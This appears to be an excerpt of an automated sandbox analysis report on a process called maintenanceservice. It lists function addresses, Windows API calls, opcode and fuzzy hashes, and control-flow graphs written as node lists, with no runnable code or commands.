                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9fe3603a21fe6eb21bf1ff4052916b0d94510ca9861d5506b769434941bcff23
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8411530618F098FEB689729855C33B36D1EB9D310F6801ABD026CB1E2DA358E05DF56
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C05D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 207 c05d22-c05d45 208 c05cd4-c05cea CreateThread CloseHandle 207->208 209 c05d47 207->209 211 c05cf0-c05d4d 208->211 212 c05d8b-c05d92 208->212 209->208 214 c05d94 211->214 212->214 215 c05d9c 212->215 218 c05cb3 214->218 219 c05c2c-c05c2f 214->219 217 c05da5-c05db6 call c052d0 215->217 230 c05c30-c05c39 217->230 231 c05dbc 217->231 218->219 220 c05cb9-c05cbd 218->220 222 c05cc3 220->222 223 c05d56-c05d5b CreateThread 220->223 222->223 226 c05cc9 222->226 228 c05c7e 223->228 229 c05d1f-c05d45 223->229 226->223 228->229 232 c05c84-c05dc8 call c05e60 call c05990 228->232 229->208 229->209 230->220 242 c05bf7 230->242 235 c05d7d-c05d89 231->235 236 c05dbe 231->236 250 c05dcd 232->250 235->212 235->214 236->235 241 c05d9b 236->241 241->215 242->220 244 c05bfd-c05c06 242->244 244->217 250->250
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 96fdb80a4e04a5b53f4da7f875e67c34da90f6c78b99a65a1a1d8d1e6302e742
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0F020A1CF0587EF2C833A895933B62C2E79D320FA40B5FC137C90E4DA248B01DE49
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C05D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 251 c05d50-c05d5b CreateThread 252 c05c78 251->252 253 c05c7e 252->253 254 c05d1f-c05d45 252->254 253->254 255 c05c84-c05dc8 call c05e60 call c05990 253->255 257 c05cd4-c05cea CreateThread CloseHandle 254->257 258 c05d47 254->258 276 c05dcd 255->276 261 c05cf0-c05d4d 257->261 262 c05d8b-c05d92 257->262 258->257 265 c05d94 261->265 262->265 266 c05d9c 262->266 271 c05cb3 265->271 272 c05c2c-c05c2f 265->272 270 c05da5-c05db6 call c052d0 266->270 283 c05c30-c05c39 270->283 284 c05dbc 270->284 271->272 274 c05cb9-c05cbd 271->274 278 c05cc3 274->278 279 c05d56-c05d5b CreateThread 274->279 276->276 278->279 281 c05cc9 278->281 279->252 281->279 283->274 292 c05bf7 283->292 286 c05d7d-c05d89 284->286 287 c05dbe 284->287 286->262 286->265 287->286 291 c05d9b 287->291 291->266 292->274 293 c05bfd-c05c06 292->293 293->270
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 931fd701415f3896c39c52e9b81a295d2f4ff08a3d7171daaf0110dae3e0420a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BB01200529F8B7BD01513310A4C12B09806E4AB34D751FEE8F730A9D2D9040E04EF2C
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C05990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 295 c05990-c0599b 297 c059a1 295->297 298 c05a33-c05a61 call c39b00 295->298 297->298 300 c059a7-c059ab 297->300 308 c05a63 298->308 309 c05ab4-c05aba call c21080 298->309 304 c059b1-c059f3 call c32320 300->304 305 c05a59 300->305 304->305 326 c059f5-c059fa 304->326 306 c05a25-c05a2d 305->306 307 c05a5b 305->307 315 c05a70-c05a7b 306->315 316 c05a2f 306->316 307->306 318 c05a23 307->318 308->309 313 c05a65 308->313 329 c05a83-c05a88 call c05df0 309->329 330 c05a13 309->330 313->315 319 c05a16-c05a1e call c21470 315->319 320 c05a7d 315->320 316->313 324 c05a24 318->324 335 c05a96-c05ac2 319->335 320->319 325 c05a7f-c05a81 320->325 325->329 327 c05a51-c05a54 call c3233c 326->327 328 c059fc 326->328 327->305 328->327 332 c059fe-c05a02 328->332 337 c05a8d VirtualAlloc 329->337 330->329 334 c05a15 330->334 332->327 334->319 335->324 339 c05ac8 335->339 337->335 339->324 340 c05ace 339->340 340->298
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 29f62f963c95ac517e6bcef111a3f20b72b523033f0a3d3134a0fb5cf338cfeb
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7721A531B2DE848FDB6A931944952B726A2F799324F58038BD096CB1D2D9284F05FE46
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C08245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 342 c08245-c08247 343 c082d2-c082d7 342->343 344 c0824d-c0824f 342->344 346 c08306-c08309 343->346 345 c08251-c08260 call c372f4 344->345 355 c08390-c08393 345->355 348 c0830b-c08311 CloseHandle 346->348 349 c0832e-c08330 346->349 348->349 351 c08332 349->351 352 c082dd-c082e3 349->352 351->352 356 c08334 351->356 353 c083a3-c083a4 352->353 354 c082e9 352->354 354->353 359 c082ef 354->359 357 c08399 355->357 358 c0827e 355->358 360 c0f524-c0f52e 356->360 357->358 361 c0839f-c083a1 357->361 358->348 362 c08284 358->362 366 c082f0-c0831c 359->366 363 c0f807 360->363 361->353 362->349 364 c0f80d 363->364 365 c0f8df-c0f8e0 363->365 364->365 367 c0f813 364->367 369 c115a5-c115aa 365->369 375 c08322 366->375 376 c081e5 366->376 372 c0f81b 367->372 373 c0f78f 367->373 371 c115ae-c115af 369->371 377 c115b2-c115b7 371->377 372->365 373->372 378 c0f795 373->378 375->376 379 c08328-c0832c 375->379 381 c082a3-c082a5 376->381 382 c081eb 376->382 380 c115ba-c115c1 377->380 378->363 379->349 383 c082c5-c082c8 379->383 384 c11750-c117a2 call c372f4 380->384 385 c115c7-c115d2 380->385 386 c083f9 381->386 387 c082ab 381->387 388 c081f1 382->388 389 c082b2-c0836f GetTokenInformation 382->389 383->386 392 c082ce 383->392 394 c11620-c11623 385->394 395 c115d4-c115d6 385->395 386->343 396 c083ff 386->396 387->386 397 c082b1 387->397 388->389 390 c081f7-c0828e 388->390 410 c08376-c0837b 389->410 400 c0828f-c08303 call c372ec 390->400 399 c082d0 392->399 392->400 404 c116a0-c116b4 394->404 405 c11625-c11628 394->405 402 c11670-c11684 395->402 403 c115dc-c115df 395->403 396->360 397->389 399->343 399->400 400->346 434 c0834f-c08355 400->434 402->369 406 c1168a-c1168d 402->406 403->380 409 c115e1-c115f6 403->409 407 c116f4-c116f5 404->407 408 c116b6-c116b9 404->408 405->380 412 c1162a-c11636 405->412 413 c11693-c11697 406->413 414 c1172f-c11738 406->414 426 c116fe-c1170c 407->426 415 c116bb 408->415 416 c1173a-c1173b 408->416 417 c116d2-c116d7 409->417 418 c115fc-c11600 409->418 410->366 419 c08381 410->419 421 c11638-c11640 412->421 422 c116dc-c116ec 412->422 424 c116bf-c116cd 413->424 423 c1173f-c11740 414->423 415->424 416->423 417->371 425 c11606-c11618 418->425 418->426 419->366 428 c08387 419->428 430 c11646-c1165f 421->430 431 c1170e-c11727 421->431 422->385 427 c116f2 422->427 433 c11744-c11748 423->433 425->377 426->433 427->384 428->355 435 c08277-c0827a 428->435 430->385 432 c11665 430->432 431->385 436 c1172d 431->436 432->384 440 c08341 434->440 441 c08212-c0821a GetTokenInformation 434->441 438 c08241 435->438 439 c0827c 435->439 436->384 438->345 438->410 439->358 439->438 440->441 444 c08347 440->444 442 c08220-c08234 441->442 443 c083af 441->443 451 c083d7-c083dd 442->451 452 c0823a 442->452 443->345 446 c083b5 443->446 444->421 447 c0834d 444->447 446->345 448 c083bb-c083ca 446->448 447->434 448->435 456 c083d0 448->456 452->451 453 c08240 452->453 455 c1b32e-c1b330 453->455 459 c1b300 455->459 460 c1b332-c1b337 call c372f4 455->460 456->435 458 c083d6 456->458 458->451 463 c1b302 459->463 464 c1b2fd 459->464 460->459 468 c1b339 460->468 466 c1b305 464->466 467 c1b2ff 464->467 469 c1b308-c1b315 466->469 470 c1b322-c1b32d 466->470 467->469 468->459 471 c1b33b-c1b33f 468->471 469->466 473 c1b317 469->473 470->455 471->469 473->464
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ef1744d48b1c56f0ecf6fc0211e3bfd52babcc0db8986298552e3dcb9ca73336
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0F93450DB418FCE76871990504766BA0BF92700B59C1DED4D7C79E2CE149E4BD352
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C083E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 605 c083e7-c083e9 606 c082c5-c082c8 605->606 607 c083ef 605->607 608 c083f9 606->608 609 c082ce 606->609 607->606 610 c083f5-c083f7 607->610 613 c082d2-c082d7 608->613 614 c083ff 608->614 611 c082d0 609->611 612 c0828f-c08303 call c372ec 609->612 610->608 611->612 611->613 615 c08306-c08309 612->615 630 c0834f-c08355 612->630 613->615 617 c0f524-c0f52e 614->617 619 c0830b-c08311 CloseHandle 615->619 620 c0832e-c08330 615->620 618 c0f807 617->618 622 c0f80d 618->622 623 c0f8df-c0f8e0 618->623 619->620 624 c08332 620->624 625 c082dd-c082e3 620->625 622->623 629 c0f813 622->629 632 c115a5-c115aa 623->632 624->625 631 c08334 624->631 627 c083a3-c083a4 625->627 628 c082e9 625->628 628->627 633 c082ef 628->633 639 c0f81b 629->639 640 c0f78f 629->640 637 c08341 630->637 638 c08212-c0821a GetTokenInformation 630->638 631->617 636 c115ae-c115af 632->636 646 c082f0-c0831c 633->646 643 c115b2-c115b7 636->643 637->638 644 c08347 637->644 641 c08220-c08234 638->641 642 c083af 638->642 639->623 640->639 645 c0f795 640->645 671 c083d7-c083dd 641->671 672 c0823a 641->672 648 c08251-c08256 call c372f4 642->648 649 c083b5 642->649 650 c115ba-c115c1 643->650 651 c11638-c11640 644->651 652 c0834d 644->652 645->618 669 c08322 646->669 670 c081e5 646->670 666 c0825b-c08260 648->666 649->648 654 c083bb-c083ca 649->654 655 c11750-c117a2 call c372f4 650->655 656 c115c7-c115d2 650->656 658 c11646-c1165f 651->658 659 c1170e-c11727 651->659 652->630 696 c083d0 654->696 697 c08277-c0827a 654->697 664 c11620-c11623 656->664 665 c115d4-c115d6 656->665 658->656 660 c11665 658->660 659->656 668 c1172d 659->668 660->655 677 c116a0-c116b4 664->677 678 c11625-c11628 664->678 674 c11670-c11684 665->674 675 c115dc-c115df 665->675 676 c08390-c08393 666->676 668->655 669->670 681 c08328-c0832c 669->681 689 c082a3-c082a5 670->689 690 c081eb 670->690 672->671 683 c08240 672->683 674->632 682 c1168a-c1168d 674->682 675->650 687 c115e1-c115f6 675->687 679 c08399 676->679 680 c0827e 676->680 685 c116f4-c116f5 677->685 686 c116b6-c116b9 677->686 678->650 688 c1162a-c11636 678->688 679->680 691 c0839f-c083a1 679->691 680->619 692 c08284 680->692 681->606 681->620 693 c11693-c11697 682->693 694 c1172f-c11738 682->694 695 c1b32e-c1b330 683->695 713 c116fe-c1170c 685->713 698 c116bb 686->698 699 c1173a-c1173b 686->699 703 c116d2-c116d7 687->703 704 c115fc-c11600 687->704 688->651 705 c116dc-c116ec 688->705 689->608 706 c082ab 689->706 701 c081f1 690->701 702 c082b2-c0836f GetTokenInformation 690->702 691->627 692->620 708 c116bf-c116cd 693->708 715 c1173f-c11740 694->715 711 c1b300 695->711 712 c1b332-c1b337 call c372f4 695->712 696->697 709 c083d6 696->709 717 c08241 697->717 718 c0827c 697->718 698->708 699->715 701->702 714 c081f7 701->714 723 c08376-c0837b 702->723 703->636 704->713 716 c11606-c11618 704->716 705->656 710 c116f2 705->710 706->608 719 c082b1 706->719 709->671 710->655 726 c1b302 711->726 727 c1b2fd 711->727 712->711 731 c1b339 712->731 721 c11744-c11748 713->721 722 c0828e 714->722 715->721 716->643 717->648 717->723 718->680 718->717 719->702 722->612 723->646 728 c08381 723->728 729 c1b305 727->729 730 c1b2ff 727->730 728->646 732 c08387 728->732 733 c1b308-c1b315 729->733 735 c1b322-c1b32d 729->735 730->733 731->711 734 c1b33b-c1b33f 731->734 732->676 732->697 733->729 737 c1b317 733->737 734->733 735->695 737->727
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8f326f9a84bd97911fb77614b6f3e103d574849e0710ed2c47c4b91ae146028
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF0B43450DA41CBCA35870984406362BA0BBA2700F6CC19DD5E6CB9E2CF24EF8FE752
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00C08318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 474 c08318-c0831c 475 c08322 474->475 476 c081e5 474->476 475->476 477 c08328-c0832c 475->477 478 c082a3-c082a5 476->478 479 c081eb 476->479 480 c082c5-c082c8 477->480 481 c0832e-c08330 477->481 482 c083f9 478->482 483 c082ab 478->483 484 c081f1 479->484 485 c082b2-c0836f GetTokenInformation 479->485 480->482 488 c082ce 480->488 491 c08332 481->491 492 c082dd-c082e3 481->492 489 c082d2-c082d7 482->489 490 c083ff 482->490 483->482 493 c082b1 483->493 484->485 486 c081f7-c0828e 484->486 504 c08376-c0837b 485->504 496 c0828f-c08303 call c372ec 486->496 495 c082d0 488->495 488->496 499 c08306-c08309 489->499 500 c0f524-c0f52e 490->500 491->492 501 c08334 491->501 497 c083a3-c083a4 492->497 498 c082e9 492->498 493->485 495->489 495->496 496->499 518 c0834f-c08355 496->518 498->497 503 c082ef 498->503 499->481 506 c0830b-c08311 CloseHandle 499->506 502 c0f807 500->502 501->500 507 c0f80d 502->507 508 c0f8df-c0f8e0 502->508 509 c082f0-c0831c 503->509 504->509 510 c08381 504->510 506->481 507->508 512 c0f813 507->512 516 c115a5-c115aa 508->516 509->475 509->476 510->509 514 c08387 510->514 524 c0f81b 512->524 525 c0f78f 512->525 519 c08390-c08393 514->519 520 c08277-c0827a 514->520 523 c115ae-c115af 516->523 533 c08341 518->533 534 c08212-c0821a GetTokenInformation 518->534 521 c08399 519->521 522 c0827e 519->522 527 c08241 520->527 528 c0827c 520->528 521->522 530 c0839f-c083a1 521->530 522->506 531 c08284 522->531 532 c115b2-c115b7 523->532 524->508 525->524 536 c0f795 525->536 527->504 535 c08251-c08260 call c372f4 527->535 528->522 528->527 530->497 531->481 539 c115ba-c115c1 532->539 533->534 540 c08347 533->540 537 c08220-c08234 534->537 538 c083af 534->538 535->519 536->502 565 c083d7-c083dd 537->565 566 c0823a 537->566 538->535 543 c083b5 538->543 544 c11750-c117a2 call c372f4 539->544 545 c115c7-c115d2 539->545 546 c11638-c11640 540->546 547 c0834d 540->547 543->535 549 c083bb-c083ca 543->549 551 c11620-c11623 545->551 552 c115d4-c115d6 545->552 553 c11646-c1165f 546->553 554 c1170e-c11727 546->554 547->518 549->520 583 c083d0 549->583 561 c116a0-c116b4 551->561 562 c11625-c11628 551->562 559 c11670-c11684 552->559 560 c115dc-c115df 552->560 553->545 555 c11665 553->555 554->545 563 c1172d 554->563 555->544 559->516 564 c1168a-c1168d 559->564 560->539 569 c115e1-c115f6 560->569 567 c116f4-c116f5 561->567 568 c116b6-c116b9 561->568 562->539 570 c1162a-c11636 562->570 563->544 571 c11693-c11697 564->571 572 c1172f-c11738 564->572 566->565 573 c08240 566->573 586 c116fe-c1170c 567->586 575 c116bb 568->575 576 c1173a-c1173b 568->576 577 c116d2-c116d7 569->577 578 c115fc-c11600 569->578 570->546 579 c116dc-c116ec 570->579 581 c116bf-c116cd 571->581 580 c1173f-c11740 572->580 582 c1b32e-c1b330 573->582 575->581 576->580 577->523 585 c11606-c11618 578->585 578->586 579->545 587 c116f2 579->587 588 c11744-c11748 580->588 590 c1b300 582->590 591 c1b332-c1b337 call c372f4 582->591 583->520 589 c083d6 583->589 585->532 586->588 587->544 589->565 594 c1b302 590->594 595 c1b2fd 590->595 591->590 599 c1b339 591->599 597 c1b305 595->597 598 c1b2ff 595->598 600 c1b308-c1b315 597->600 601 c1b322-c1b32d 597->601 598->600 599->590 602 c1b33b-c1b33f 599->602 600->597 604 c1b317 600->604 601->582 602->600 604->595
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 00C0830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00C08369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b9d1d2bae53b32a953845262fbc65bf2b703c0d6b129ca21c6772cfc0ea5f4f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30F0903440DA41CBCA758A19844057527A07FA2750B6CC15DD4E6CB9E2CE24EF8BE762